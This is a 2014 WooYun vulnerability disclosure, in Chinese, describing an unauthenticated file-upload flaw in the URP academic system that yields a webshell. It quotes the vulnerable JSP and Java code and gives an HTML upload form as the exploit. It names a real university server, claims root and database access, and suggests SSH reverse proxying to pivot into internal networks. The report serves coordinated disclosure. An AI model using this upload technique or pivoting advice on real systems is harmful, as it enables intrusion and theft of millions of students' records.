当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-075251

漏洞标题:URP综合教务系统通杀第三弹(无需登录GETSHELL)

相关厂商:北京清元优软科技有限公司

漏洞作者: HackPanda

提交时间:2014-09-09 14:34

修复时间:2014-12-08 14:36

公开时间:2014-12-08 14:36

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-09: 细节已通知厂商并且等待厂商处理中
2014-09-14: 厂商已经确认,细节仅向厂商公开
2014-09-17: 细节向第三方安全合作伙伴开放
2014-11-08: 细节向核心白帽子及相关领域专家公开
2014-11-18: 细节向普通白帽子公开
2014-11-28: 细节向实习白帽子公开
2014-12-08: 细节向公众公开

简要描述:

我不是杀手- -首先在这里感谢我的已经毕业了的学长,没有学长的前期娴熟的分析,不会有这个漏洞的后续挖掘。发现某个系统被入侵了后,学长详细的查看了日志,并锁定了存在漏洞的文件,我所做的只是站在巨人的肩膀上蹦跶了一下..也谢谢学长给我找个分析的机会..你肯定也早就知道了这个成因了吧..如下图有学长分析的,我又重新截了下图,说得太多啦哈哈。你们不愿意看来打我啊~

详细说明:

如上所述,这次发现是从被入侵的URP的日志分析开始的。经后续测试通杀1.38 1.5,

1.png


日志2.png


由第一个日志我们看到了这个入侵者在没有对lwUpLoad_action.jsp这个页面访问而是直接POST数据过去,说明这个入侵者早就知道了这个漏洞的利用方法,并且肯定已经入侵了不少相同的系统。
既然知道了入侵者是通过那个地方进入的,剩下的就开始分析吧。
首先,这个系统使用了Smartupload组件,先来看下lwUpLoad_action的部分源码。

<script language="javaScript" type="">
          //转向
          function doAction(type){
			document.forms[0].action="uploadLwywAction.do?actionType=upload&returnStr="+type;
			//alert(document.forms[0].action);
            document.forms[0].submit();
          }
</script>
</head>
<body>
<form  method="post" action="/uploadLwywAction" >
<%
	SmartUpload  mySmartUpload = new SmartUpload();
	mySmartUpload.initialize(pageContext);
    mySmartUpload.upload(); 
    //int fileSize=mySmartUpload.getSize();
    File file=mySmartUpload.getFiles().getFile(0);
    Request req=mySmartUpload.getRequest();
    //扩展名
    String fileExt=file.getFileExt();
    String realPath=request.getRealPath("/lwUpLoadTemp");
    String fileName=req.getParameter("xh")+"."+fileExt;
    String filePath=realPath+"/"+fileName;
    if(!file.isMissing()){
    	file.saveAs("/lwUpLoadTemp/"+fileName,mySmartUpload.SAVE_VIRTUAL);
    }
  	String returnStr=TestBean.uploadLwyw(filePath,req);
  	//根据返回值 判断操作
  	if(returnStr.equals("yes")){%>
  	<input type="hidden" name="zxjxjhh" value="<%=req.getParameter("zxjxjhh") %>">
  	<input type="hidden" name="tmbh" value="<%=req.getParameter("tmbh") %>">
  	<input type="hidden" name="xh" value="<%=req.getParameter("xh") %>">
  	<script type="text/javascript">doAction("yes")</script>
  	<%
  	}else if(returnStr.equals("full")){
  	 %>
	<script type="text/javascript">doAction("full")</script>
	<%
	}else {
	 %>
	 <script type="text/javascript">doAction("error")</script>
	 <%
	 }
	  %>


初步一看这个代码没啥问题吧,这个文件名使用学号命名的,也符合正常逻辑..继续看这个uploadlwyw.jsp的一部分代码,

function doUpload(){
			var chooseFile = null;
            var chooseFileType = null;//选择的文件类型
           var uploadlwyw = document.uploadLwywForm.theFile.value;
            var pos = uploadlwyw.lastIndexOf(".");
            var uploadlwywType = uploadlwyw.substring(pos + 1,uploadlwyw.length);//上传文件的类型
			if(uploadlwywType.toLowerCase()=="docx"){
				uploadlwywType = "doc";
			}
            //得到用户选择的文件类型
            for(var i=0;i<3;i++){
              if(document.uploadLwywForm.wjlx[i].checked){
                chooseFileType = document.uploadLwywForm.wjlx[i].value;
                if(chooseFileType == "doc"){
                  chooseFile = "word";
                }
                if(chooseFileType == "pdf"){
                  chooseFile = "pdf";
                }
                if(chooseFileType == "zip"){
                  chooseFile = "latex";
                }
              }
            }
            //与上传的文件类型比较
            if(uploadlwywType.toLowerCase() != chooseFileType){
              alert("论文原文请上传" + chooseFile + "类型的文件!");
              return false;
            }
            if(document.uploadLwywForm.lwywwbb.value == "" && chooseFile == "word"){//版本判断
                  alert("提交word类型的论文原文需添版本号!");
                  document.uploadLwywForm.lwywwbb.focus();
                  return false;
            }
			document.uploadLwywForm.action="lwUpLoad_action.jsp";
            document.uploadLwywForm.submit();
          }
          //改变上传文件类型
          function doChange(type){
            if(type != "word"){
              document.uploadLwywForm.lwywwbb.value ="";
              document.uploadLwywForm.lwywwbb.disabled = true;
            }else{
              document.uploadLwywForm.lwywwbb.disabled = false;
            }
          }

这你妹这么重要的上传用js写不是打脸吗...在这里也没有限制上传类型,当然还得看后端的处理,别急,马上就来。我们来看下UploadLwywAction,这个路径我不写了,自己找吧,这是个java字节码,需要反编译成java源码,我把错误处理的去掉,上传部分代码如下

String action = httpServletRequest.getParameter("actionType");
		if (action.equals("upload"))
			return upload(actionMapping, actionForm, httpServletRequest, httpServletResponse);
public ActionForward upload(ActionMapping actionMapping, ActionForm actionForm, HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse)
	{
		UploadLwywForm form;
		UploadLwywForm uploadLwywActionForm = (UploadLwywForm)actionForm;
		HttpSession session = httpServletRequest.getSession(false);
		UserInforVO userInfor = (UserInforVO)session.getAttribute("userInfor");
		form = (UploadLwywForm)actionForm;
		if (isSuccess.equals("yes"))
		{
			String zxjxjhh = form.getZxjxjhh();
			String tmbh = form.getTmbh();
			String xh = form.getXh();
			LwLwxxbId lwLwxxbId = new LwLwxxbId(new LwXtb(new LwXtbId(new LwTmxxb(new LwTmxxbId(zxjxjhh, tmbh)), xh)));
			LwLwxxbLogic lwLwxxbLogic = new LwLwxxbLogic();
			LwLwxxb lwLwxxb = lwLwxxbLogic.getLwxxb(lwLwxxbId);
		}


这后端也没有处理啊,我擦这不是个任意文件上传吗...自己写个表单就好了...

<form action="http://x.x.x.x/lwUpLoad_action.jsp" method="post" enctype="multipart/form-data" >
 <input type="file" name="theFile" id="File"/>
 <input type="text" name="xh" id="context"/>
 <input type="submit" value="show me the shell" >
 </form>

修改的位置你懂得,shell地址我不明写了,稍微看得懂代码就行,防止某些人直接利用好吧...

漏洞证明:

有了getshell 这个基本上任意脱教务的裤子了,这个影响大概千万人数据吧,就算Oracle部署在内网了 getshell上去基本都是root权限,测试了15个左右除了北邮的新建了账户外其他都是跑在root的,但是北邮的亲..你们敢不敢不要用su..这赤裸裸的root密码我都不好意思,就以北邮世纪学院为例吧,北邮本校的urp那个部署在本机的oracle还是弱密码呢....首先用这个表单上传一个shell吧 网站是http://111.204.7.29:8080/

butp shell.png


dbpass.png


root.png

ssh反代会用吧,翻墙的亲们,只要这个主机可以ssh上,就可以用反代配全局继续内网渗透,或者可以脱裤,oracle就算部署在内网肯定教务系统也是可以直连的。

waiwang.png

修复方案:

cncert老板,这个有证书喵?修复的话在后端action做验证吧,请cert晚确认,延长时间便于修复...我的信息就在里面啊- -抄报厂商好好修复吧。谢谢

版权声明:转载请注明来源 HackPanda@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-09-14 09:51

厂商回复:

最新状态:

暂无